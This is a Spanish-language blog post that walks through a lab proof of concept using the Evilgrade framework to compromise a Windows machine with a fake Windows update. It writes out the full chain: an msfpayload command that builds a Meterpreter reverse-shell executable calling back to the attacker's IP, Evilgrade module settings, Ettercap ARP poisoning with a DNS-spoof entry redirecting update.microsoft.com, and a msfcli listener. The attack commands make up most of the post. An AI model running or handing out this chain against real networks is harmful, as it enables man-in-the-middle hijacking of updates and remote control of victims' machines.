22 enero, 2015

Evilgrade

Hola a tod@s

Tenía ganas de conocer bien a fondo a Evilgrade, un framework para comprometer equipos en un test de intrusión a través de actualizaciones no legítimas. Cuenta con una amplia variedad de módulos, como Ccleaner, Quicktime, Java, Winamp, Virtualbox, Vmware, etc.


Para comenzar con la Poc, necesitaremos Metasploit, Ettercap y por su puesto Evilgrade. Lo primero que haremos es crear el payload malicioso, esto será el ejecutable de la actualización falsa.

Imagen 1: Creación Payload

En mi caso sería:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 X > /root/update.exe

Ahora es turno de Evilgrade, elegimos el modulo, yo me decante por las actualizaciones de Windows.:
config winupdate

Imagen 2: Elección Modulo Evilgrade

A continuación abrimos Ettercap, elegimos la interfaz de red.

Imagen 3: Interfaz de red


Procedemos a escanear la red y listar los host que se van a spoofear, el target 1 será la puerta de enlace y el target 2 la maquina víctima, a continuación nos situamos en la pestaña Mitm y hacer click en Arp poisoning.

Imagen 4: Configuración Ettercap

Para terminar con Ettercap activamos el plugin dns spoof.

Imagen 5: Plugin dns spoof

Ahora volvemos a Evilgrade y especificamos la ruta del payload que creamos anteriormente.
set agent /root/update.exe
start

Imagen 6: Identificar agent

Ya podemos probar el ataque, para ello lanzamos start en Evilgrade y Ettercap, por otro lado igualmente dejamos listo Metasploit, para ello vamos a dejar a la escucha.
msfcli exploit/multi/handler/ PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=4444 E

Imagen 7: Windows Update

A continuación vamos a la maquina víctima y actualizamos Windows.

Imagen 8: Descarga Payload Malicioso

Como vemos nos descargamos el update.exe

Imagen 9: Sesión exitosa Meterpreter

Como vemos nos descargamos el update.exe y el atacante observará una bonita sesión exitosa de Meterpreter y partir de ahí como dice mi amigo Pablo "El límite es tu imaginación"

Nota: El archivo etter.dns de vuestra maquina debe estar definido vuestra ip local con la web a spoofear, por ejemplo:
192.168.1.134 A update.microsoft.com


No seáis malos.

1 comentarios:

  1. Hola Francisco, me alegra que les haya gustado nuestra herramienta, tal vez si les interesa pueden escribir algo sobre una nueva herramienta nuestra:
    http://github.com/infobyte/faraday

    ResponderEliminar